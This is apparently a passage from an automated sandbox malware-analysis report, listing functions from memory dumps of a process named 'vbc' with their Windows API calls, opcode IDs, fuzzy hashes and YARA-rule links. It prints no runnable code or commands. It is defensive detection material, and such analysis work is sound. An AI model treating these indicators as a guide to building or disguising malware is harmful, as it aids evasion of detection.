                                                              • Instruction Fuzzy Hash: 773148B0D002899FDB18CFA9C84479EBFF1BB88314F148629E815A7380D774A446DF96
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A276638 Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 0A2766F1
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID:
                                                              • API String ID: 3660427363-0
                                                              • Opcode ID: b4a0dcfe23b2d760283fb787d32cb7e4b21cf8de0b0cfa984b14703d6f2f0174
                                                              • Instruction ID: 2eb59464efb8643f773e99eb787d4ab34038163a3e74509cdef88e0fb3512f9e
                                                              • Opcode Fuzzy Hash: b4a0dcfe23b2d760283fb787d32cb7e4b21cf8de0b0cfa984b14703d6f2f0174
                                                              • Instruction Fuzzy Hash: AE31FDB1D10258DFCB24CFAAC984ACEBBF5BF48310F55802AE819AB310D7749905CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8475 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: d2103f1c7c9a5712b4613c2dec318e7d67ee9a073bc17e5addad13e76285b7e1
                                                              • Instruction ID: 3aaaabb56d5ffffb6886132bd8985b554f706469104d566a958b041566e9bf78
                                                              • Opcode Fuzzy Hash: d2103f1c7c9a5712b4613c2dec318e7d67ee9a073bc17e5addad13e76285b7e1
                                                              • Instruction Fuzzy Hash: 7E41E974906268CFCB66DF74E8886A9B7B2BF4634AF1041D9D40AA3740CF359D81CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A276380 Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?), ref: 0A276434
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: e76b20eb0e886d96acdf97b4546571ce2d6e2a0f2dba435d3669fd2598612acc
                                                              • Instruction ID: 39af306b3c588bb7d673e4d817ac4ddf94428fb7ab3c46f56665e4d69963354a
                                                              • Opcode Fuzzy Hash: e76b20eb0e886d96acdf97b4546571ce2d6e2a0f2dba435d3669fd2598612acc
                                                              • Instruction Fuzzy Hash: 443132B0C102498FCB10CF99C584A8EFFF4BF48314F29812AE808AB340D7749985CF95
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE84BD Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 1099070b62476e0896cf47e7b57a69cd22a763a38cdd90ecf7eb1b1b58d249d8
                                                              • Instruction ID: 4f044fd6b2088e1741f92aa5d84eab1794d4df9c0e2c1a8073eabea16dc9227b
                                                              • Opcode Fuzzy Hash: 1099070b62476e0896cf47e7b57a69cd22a763a38cdd90ecf7eb1b1b58d249d8
                                                              • Instruction Fuzzy Hash: 7741CA74906268CFCB66DF74E8886A9B7B2BF4634AF1040D9D40AA3740CF359D85CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8505 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: ea9dae541559ead36c9dacc3334f149dbf77dcfb593ea373fdeb01d822dde791
                                                              • Instruction ID: 4c76cc57e6c1e1971c6d9f062c138ec6f9e453a1b6d4664c42b7bf27ce083eae
                                                              • Opcode Fuzzy Hash: ea9dae541559ead36c9dacc3334f149dbf77dcfb593ea373fdeb01d822dde791
                                                              • Instruction Fuzzy Hash: 7E31CC74906268CFCB66DF74E8886E9B7B2BF4A34AF1041D9D40AA3740CB359D81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE854D Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 779cc462d7621a7a9cee61ed74dc4bb93a871870fe48293767951b8b7f4e8420
                                                              • Instruction ID: 6acff44f930eb4f74dd5ffa74f5efa3e91a910dece89b49528fcd7abe26f3d05
                                                              • Opcode Fuzzy Hash: 779cc462d7621a7a9cee61ed74dc4bb93a871870fe48293767951b8b7f4e8420
                                                              • Instruction Fuzzy Hash: 3B31BA74A06268CFCB66DF64E8886D9B7B2BF4634AF1040D9D50AA3740CB359E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE5E74 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(00000000), ref: 09EE6848
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile
                                                              • String ID:
                                                              • API String ID: 4033686569-0
                                                              • Opcode ID: a8a7510083f37ee45a9fb9844f8397650afd904cf440482adb87b519de367246
                                                              • Instruction ID: ecc9456b91b8db6a9952b85dd9f374d7e52bd5a93c1fac42d1d2a5a868629345
                                                              • Opcode Fuzzy Hash: a8a7510083f37ee45a9fb9844f8397650afd904cf440482adb87b519de367246
                                                              • Instruction Fuzzy Hash: 602147B1C006199BCB10CF9AD54479EFBF4EB48728F05852AE814B7640D738A945CFE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04F04CB8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 04F04D42
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID:
                                                              • API String ID: 2118026453-0
                                                              • Opcode ID: 35e0aa66331d45b8ffb27dd961ea8ac9d3c9d28c07a7af3a968a9b08198741f9
                                                              • Instruction ID: e410b0cec1d4648e7394ec252a9554009df5e6cd9beaf3223248cc420547ace4
                                                              • Opcode Fuzzy Hash: 35e0aa66331d45b8ffb27dd961ea8ac9d3c9d28c07a7af3a968a9b08198741f9
                                                              • Instruction Fuzzy Hash: F121FF719013899FCB10DFA9D9083AEBFF0FB89314F24846AC405A7681C7386585CF62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8595 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 23c1bf211e70aa2e09c2b7906a774a6735b6604befb586d16c40ef8e48ac7907
                                                              • Instruction ID: a02d97dbf92761942f3f8fd21515f48d58d2be20b1bc413efc976ba84e2091b7
                                                              • Opcode Fuzzy Hash: 23c1bf211e70aa2e09c2b7906a774a6735b6604befb586d16c40ef8e48ac7907
                                                              • Instruction Fuzzy Hash: A621BA74A06268CFCB65DF64E8886D9B7B2BF4634AF1040D9D50AA3740CF355E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04F04CC8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 04F04D42
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.537115057.0000000004F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_4f00000_vbc.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer
                                                              • String ID:
                                                              • API String ID: 2118026453-0
                                                              • Opcode ID: 22f352f3852709965244bc25992410f148feabb1566de6b0a7fd02f396df149d
                                                              • Instruction ID: ed2abedd66ea9be1032496f3ea0968b0ee344e985528d447741285363982d073
                                                              • Opcode Fuzzy Hash: 22f352f3852709965244bc25992410f148feabb1566de6b0a7fd02f396df149d
                                                              • Instruction Fuzzy Hash: AB11B1719013499FDB10DFA9D50879EBBF4FB88314F248429D405A3680CB796585CFA6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE85DD Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 664dd7efa7cf4a465a02df27634ec3431896c304030e18d02387bffb5e7f9bf9
                                                              • Instruction ID: 6883111d05350ff238818de759089e479178ebc363271c6eddecca4d9eea4f40
                                                              • Opcode Fuzzy Hash: 664dd7efa7cf4a465a02df27634ec3431896c304030e18d02387bffb5e7f9bf9
                                                              • Instruction Fuzzy Hash: 9111BA74A06258CFCB25DF64E8886E9B7B2BF4634AF1040D9D50AA3740CB355E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A2764C1 Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: a2a1d27ebaf35924316c537b856216e7c4883a471e9c64a67c998c51fff6a7e4
                                                              • Instruction ID: 34a8c7022e127f17bbfba27866f80d21eba48abdd6b0a038d175a8603e363221
                                                              • Opcode Fuzzy Hash: a2a1d27ebaf35924316c537b856216e7c4883a471e9c64a67c998c51fff6a7e4
                                                              • Instruction Fuzzy Hash: 451145B18002488FDB20DFA9D548BDEFBF4EF48324F25845AD519A7200C338A644CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0A2764C8 Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.547679913.000000000A270000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_a270000_vbc.jbxd
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 0929b717ead753a029075379afd44a8c7be898d07096c6174b3aeff1bc15a81e
                                                              • Instruction ID: adde5ac4e0d6eb446849e93e6ba522afb25a6ae8b3049d66e6d4c50400afb320
                                                              • Opcode Fuzzy Hash: 0929b717ead753a029075379afd44a8c7be898d07096c6174b3aeff1bc15a81e
                                                              • Instruction Fuzzy Hash: 211135B58003488FCB10DFAAD548BCEFBF4EB48324F24841AD519A7300C378AA44CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8619 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 26fdc75090680c20ad73acfccaa212835ef615a5e912f4d620ddceff026d3efb
                                                              • Instruction ID: e6456d0e33e83f9057394a67c94e7061882b3f8c0058ce3d461e1dfdc3261d69
                                                              • Opcode Fuzzy Hash: 26fdc75090680c20ad73acfccaa212835ef615a5e912f4d620ddceff026d3efb
                                                              • Instruction Fuzzy Hash: 0D11E674E06268CFCB26DB64E8886D9B7B2BF46346F1040E9D50AA3240CB705E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE8661 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 01ae7ff3afc5c478928a4e511113d7a68cea68b260f1398604c1e26ec15a90cd
                                                              • Instruction ID: 2787ac5a693c748cbd44e3b6f96c55d76b5eb64e0d87e9aa94a626ffd094decb
                                                              • Opcode Fuzzy Hash: 01ae7ff3afc5c478928a4e511113d7a68cea68b260f1398604c1e26ec15a90cd
                                                              • Instruction Fuzzy Hash: 7001D374A06268CFCB25EB64E8886D9B7B1FF4630AF1041EAD44AA3240CB705E81CF56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE86A9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 56d67800996a9b34a8231b3cd1d399e936f9ae07778391ddb8c1f15895203270
                                                              • Instruction ID: 17c355302a42bd9bb9b027dc9041aada733570291c199cf275fee9e726c2a559
                                                              • Opcode Fuzzy Hash: 56d67800996a9b34a8231b3cd1d399e936f9ae07778391ddb8c1f15895203270
                                                              • Instruction Fuzzy Hash: D7F0B275A062688FCB61DB68E8886D9B7B1FF45319F1040E6D58AA3240CF705EC18F56
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 09EE86F1 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserExceptionDispatcher.NTDLL ref: 09EE8718
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.545686526.0000000009EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_9ee0000_vbc.jbxd
                                                              Similarity
                                                              • API ID: DispatcherExceptionUser
                                                              • String ID:
                                                              • API String ID: 6842923-0
                                                              • Opcode ID: 4205af9892ce2cc7c71d3d1c19a444a4fccbc026970098be778788a096df7199
                                                              • Instruction ID: fc10c8b14e3c6e42fc2458c26ce05515f41e3a834dfcff16ab1c0a2ace183eb9
                                                              • Opcode Fuzzy Hash: 4205af9892ce2cc7c71d3d1c19a444a4fccbc026970098be778788a096df7199
                                                              • Instruction Fuzzy Hash: 6BF0A575E062288FCB21DB68E9846DDB3B1FF45319F1050E6D54DA3240CB705E808F55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C0DA00 Relevance: 1.0, Instructions: 1026COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536797534.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_c0d000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 29b841b73e437d04d44102f6cdf86350714d78796403148926c1c95b70aaee7d
                                                              • Instruction ID: 91f59546b4badd78e9fcede3db423aecd6fe08701dc40a02c2f7de6737bbf3e2
                                                              • Opcode Fuzzy Hash: 29b841b73e437d04d44102f6cdf86350714d78796403148926c1c95b70aaee7d
                                                              • Instruction Fuzzy Hash: 9542C37584F7C26FCB478B3888766417FB16F2324871A00DBD4D1CE4B3D61A8A1ADB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BFD3EC Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4567660c38122a8b09878eaf6ee06f7c3ff97523311bc688620557ca463dffe8
                                                              • Instruction ID: 1841a61d7a3f2d0f330cf0ca3e865184eb91e5f88cbe93335773c757fed2853b
                                                              • Opcode Fuzzy Hash: 4567660c38122a8b09878eaf6ee06f7c3ff97523311bc688620557ca463dffe8
                                                              • Instruction Fuzzy Hash: 7B213AB1504248DFDB05DF14D9C4B36BBA6FB94324F24C5A9DA094B346C336E85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BFD4D8 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8762885cdefcc972edee20bab1b07a037568adac13bb5f317ad96b15221f107b
                                                              • Instruction ID: a24e6951d2b6bd93926ff2ac5875f95ba5a7ce2490c030217da463559b0bad6c
                                                              • Opcode Fuzzy Hash: 8762885cdefcc972edee20bab1b07a037568adac13bb5f317ad96b15221f107b
                                                              • Instruction Fuzzy Hash: 8F213AB1504348DFDB05CF54D9C4B36BBE6FBA8328F2485A9DA054B246C336D849CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00C0E3DC Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536797534.0000000000C0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C0D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_c0d000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 000016eb3156494b5422efde235160a5f1f50ae937e7e815ecd02abc772f5f9f
                                                              • Instruction ID: ace501b874565df4ea88200745ee01c7cda5b69a8a906db39f2eddf0491893f3
                                                              • Opcode Fuzzy Hash: 000016eb3156494b5422efde235160a5f1f50ae937e7e815ecd02abc772f5f9f
                                                              • Instruction Fuzzy Hash: 8E2107B1644244DFDB04DF94D9C4B26BBA5FB88324F24C96DD9094B386C33AD846CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BFD3E7 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction ID: a1ed9eed13e03912d0d6a23270943e9adcf9a7ef4bd620ccbf7c9dcdf303532e
                                                              • Opcode Fuzzy Hash: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction Fuzzy Hash: E811B476404284DFDB01CF10D9C4B26BFB2FB94324F24C6A9D9080B756C336D85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BFD4D3 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.536738019.0000000000BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_bfd000_vbc.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction ID: 9aa570a1000abeab480cb06df113f532a67cb35fcaa6b75e3f43d33400a28b4b
                                                              • Opcode Fuzzy Hash: 75ad921a90c5a80d0e06afb818f831ed5976852882da7f26f8f1702c903aed74
                                                              • Instruction Fuzzy Hash: 4611D376504284CFDF12CF10D9C4B26BFB2FB94324F2486A9D9050B616C33AD85ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%